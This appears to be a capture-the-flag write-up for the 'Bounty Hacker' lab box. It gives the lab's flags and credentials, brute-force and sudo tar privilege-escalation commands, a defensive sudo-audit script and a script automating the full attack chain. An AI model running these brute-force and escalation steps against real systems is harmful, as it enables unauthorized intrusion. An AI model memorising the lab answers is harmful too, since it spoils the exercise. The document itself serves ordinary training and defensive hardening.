Overview
Bounty Hacker is a straightforward box that teaches the classic
FTP-to-SSH-to-root pipeline. Anonymous FTP leaks a username and a custom
password wordlist, Hydra brute-forces SSH in seconds, and a misconfigured
sudo /bin/tar rule gives instant root via GTFOBins checkpoint abuse.
nmap → 21/FTP, 22/SSH, 80/HTTP
↓
ftp anonymous → task.txt (author: lin) + locks.txt (26 passwords)
↓
hydra SSH brute-force → lin:RedDr4gonSynd1cat3
↓
ssh lin@ → user.txt: THM{CR1M3_SyNd1C4T3}
↓
sudo -l → (root) /bin/tar
↓
sudo tar --checkpoint-action=exec=/bin/sh → root
↓
root.txt: THM{80UN7Y_h4cK3r}
Port Scan & Service Discovery
$ nmap -sV -sC -T4 -p- --min-rate 5000 -Pn 10.48.146.252
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.5 | Anonymous login allowed |
| 22/tcp | SSH | OpenSSH 8.2p1 | Brute-force target |
| 80/tcp | HTTP | Apache 2.4.41 | Cowboy Bebop themed page |
Three services running. FTP with anonymous login is the obvious first target.
FTP — Anonymous Access
Anonymous FTP login yields two files, task.txt and locks.txt:
task.txt:
1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin
Task list author: lin — our target SSH username.
locks.txt (excerpt):
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
...
RedDr4gonSynd1cat3   ← the one
...
ReDSynd1ca7e
A 26-entry wordlist of Dragon Syndicate leet-speak variations. Combined with
username lin, this is a textbook SSH brute-force setup.
Hydra SSH Brute-Force
$ hydra -l lin -P locks.txt ssh://10.48.146.252 -t 16 -f -V
[ATTEMPT] target 10.48.146.252 - login "lin" - pass "rEddrAGON" - 1 of 26
...
[22][ssh] host: 10.48.146.252   login: lin   password: RedDr4gonSynd1cat3
[STATUS] attack finished for 10.48.146.252 (valid pair found)
Hit on attempt 10 of 26. Password: RedDr4gonSynd1cat3. One caveat on -t 16:
Hydra's ssh module warns that many SSH servers cap parallel sessions (OpenSSH's
MaxStartups defaults to 10:30:100) and recommends -t 4. With 26 candidates it
made no difference here, but against a longer list the dropped connections can
make Hydra skip the valid pair without reporting it.
SSH — User Shell & Flag
$ ssh lin@10.48.146.252
Password: RedDr4gonSynd1cat3
$ cat ~/Desktop/user.txt
THM{CR1M3_SyNd1C4T3}
sudo /bin/tar → GTFOBins Root
$ sudo -l
User lin may run the following commands:
    (root) /bin/tar
tar is a well-known GTFOBins sudo vector. --checkpoint=N makes tar run a
checkpoint action every N records, and --checkpoint-action=exec=CMD runs CMD at
each checkpoint with tar's privileges, which under this sudo rule means root.
Archiving /dev/null to /dev/null is just a throwaway operation that reaches the
first checkpoint immediately, at which point the callback spawns a root shell:
$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
# whoami
root
# cat /root/root.txt
THM{80UN7Y_h4cK3r}
Attack Chain
- task.txt → username lin, locks.txt → 26-entry password wordlist
- lin:RedDr4gonSynd1cat3 — hit on attempt 10 of 26
- cat ~/Desktop/user.txt → THM{CR1M3_SyNd1C4T3}
- --checkpoint-action=exec=/bin/sh → THM{80UN7Y_h4cK3r}
Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| sudo /bin/tar (GTFOBins) | sudoers config | Critical | Instant root via checkpoint callback |
| Weak SSH password | SSH (22) | High | Brute-forced in 10 attempts from custom wordlist |
| Anonymous FTP with sensitive files | FTP (21) | High | Username and password wordlist exposed |
Takeaways
tar’s --checkpoint-action flag makes it a trivial privesc vector, and it is only
one of many: any sudo-granted binary that can spawn a process or open an
arbitrary path is equivalent to granting sudo ALL. Cross-reference every sudo
rule with GTFOBins before deployment, and replace the ones that appear there
with a wrapper script that takes no user-controlled arguments. The two footholds
are just as avoidable: keep internal notes off an anonymous FTP share, and
require keys or rate-limit password logins on SSH so a 26-entry wordlist cannot
be tried in seconds.
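The cross-reference above can be scripted. The following is an added example for this page, not the write-up's code and not bounty_hacker.sh: it parses sudo -l output and flags grants whose binary is on a short, hand-picked excerpt of the GTFOBins sudo list. The list and the sample sudo -l output are this example's own assumptions, modelled on the tar rule above.

```shell
#!/bin/sh
# Added example, not part of the original write-up or bounty_hacker.sh:
# audit the grants in `sudo -l` output against a short list of binaries that
# GTFOBins documents as sudo-to-root vectors. The list is a hand-picked,
# partial excerpt (an assumption of this example); refresh it from
# https://gtfobins.github.io/ before relying on it.

GTFO_SUDO_BINS="tar vim vi nano less more find awk python python3 perl ruby env bash sh zip unzip nmap tcpdump git"

# Read `sudo -l` output on stdin and print the command granted by each
# "(runas) [TAG:] command[, command ...]" line, one per line, without arguments.
# sed keeps only grant lines and drops the "(root)" part, tr splits
# comma-separated grants, and awk skips NOPASSWD:/SETENV:-style tags.
sudo_l_commands() {
  sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*//p' |
    tr ',' '\n' |
    awk 'NF { i = 1; while ($i ~ /^[A-Z_]+:$/) i++; print $i }'
}

# Print one "FLAG ..." line per dangerous grant: "ALL" (unrestricted sudo) or a
# command whose basename appears in GTFO_SUDO_BINS. Prints nothing when clean.
audit_sudo_l() {
  sudo_l_commands | while read -r cmd; do
    if [ "$cmd" = "ALL" ]; then
      echo "FLAG ALL (unrestricted sudo)"
      continue
    fi
    base=${cmd##*/}
    for g in $GTFO_SUDO_BINS; do
      if [ "$base" = "$g" ]; then
        echo "FLAG $cmd (GTFOBins sudo entry: $g)"
        break
      fi
    done
  done
}

# Constructed sample modelled on the write-up's `sudo -l` output, with a second,
# harmless grant added to show that only the tar rule is flagged.
SAMPLE_SUDO_L='User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/systemctl restart apache2'

# On a live host: sudo -l | audit_sudo_l
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
```

Run it as sudo -l | audit_sudo_l on every account that has sudo rights; anything it flags should be removed from sudoers or wrapped in a script that exposes no user-controlled arguments. The embedded list is deliberately short and is not a substitute for checking GTFOBins itself.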
Full-Chain Exploit Script
The complete chain is automated in bounty_hacker.sh — dependency
check, nmap recon, FTP extraction, Hydra brute-force, SSH flag retrieval, and sudo
tar privilege escalation.
$ chmod +x bounty_hacker.sh
$ ./bounty_hacker.sh 10.48.146.252
[+] Task author : lin
[+] Wordlist : locks.txt (26 entries)
[+] SSH credentials — lin : RedDr4gonSynd1cat3
[+] user.txt → THM{CR1M3_SyNd1C4T3}
[+] root.txt → THM{80UN7Y_h4cK3r}
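The glue between Hydra and sshpass that a chain script like this needs, as an added example written for this page (the write-up does not reproduce bounty_hacker.sh, and this is not it). parse_hydra_hit reads Hydra's output and returns the valid login:password pair; ssh_cmd runs a command with it via sshpass -e, so the password comes from the environment rather than the process list; run_chain is the chain end to end and only executes when a target is passed. The Hydra output used to exercise the parser is constructed from the success line shown above, Hydra is run with -t 4 per its own warning for the ssh module, and the tar callback reads root.txt directly instead of spawning a shell, since a non-interactive session has no terminal to drive /bin/sh.

```shell
#!/bin/sh
# Added example for this page, not the write-up's bounty_hacker.sh: the glue a
# chain script needs between Hydra and sshpass. Target, user and file names are
# the write-up's; the sample Hydra output is constructed from the line it shows.

# Extract "login:password" from the first Hydra success line, e.g.
#   [22][ssh] host: 10.48.146.252   login: lin   password: RedDr4gonSynd1cat3
# The password is taken as everything after "password: " so spaces survive.
# Prints nothing and returns 1 when Hydra found no valid pair.
parse_hydra_hit() {
  awk '/^\[[0-9]+\]\[[a-z]+\] host:/ {
         u = $0; sub(/.*login: /, "", u); sub(/ +password: .*/, "", u)
         p = $0; sub(/.*password: /, "", p)
         print u ":" p
         found = 1
         exit
       }
       END { exit (found ? 0 : 1) }'
}

# Run one command over SSH as the brute-forced user.
# $1 = host, $2 = login:password, remaining args = remote command.
# sshpass -e reads the password from SSHPASS so it never appears in `ps`;
# host-key checking is relaxed only because this is a throwaway lab target.
ssh_cmd() {
  host=$1
  login=${2%%:*}
  pass=${2#*:}
  shift 2
  SSHPASS=$pass sshpass -e ssh -o StrictHostKeyChecking=no \
    -o UserKnownHostsFile=/dev/null "$login@$host" "$@"
}

# The chain end to end (touches the network, so only run when a target is given).
# -t 4 follows Hydra's own warning that SSH servers cap parallel sessions.
run_chain() {
  target=$1
  creds=$(hydra -l lin -P locks.txt "ssh://$target" -t 4 -f 2>/dev/null | parse_hydra_hit) || {
    echo "[-] no valid credentials found" >&2
    return 1
  }
  echo "[+] SSH credentials: $creds"
  echo "[+] user.txt: $(ssh_cmd "$target" "$creds" cat Desktop/user.txt)"
  # The checkpoint callback runs as root; read the flag through it instead of
  # spawning /bin/sh, which a non-interactive session cannot drive.
  echo "[+] root.txt: $(ssh_cmd "$target" "$creds" \
    "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='cat /root/root.txt'")"
}

if [ -n "${1:-}" ]; then
  run_chain "$1"
fi
```

Invoke it as ./chain.sh 10.48.146.252 with locks.txt in the working directory. The parser is the part worth keeping: Hydra's success line is stable across modules ([PORT][module] host: ... login: ... password: ...), so the same function serves an FTP or HTTP brute-force, and its non-zero return lets a script fail closed instead of attempting SSH with an empty password.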
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| ftp | Anonymous FTP file retrieval |
| hydra | SSH credential brute-force |
| sshpass | Non-interactive SSH authentication |
| tar | Privilege escalation (GTFOBins checkpoint abuse) |
| bounty_hacker.sh | Full-chain automated exploit (Bash) |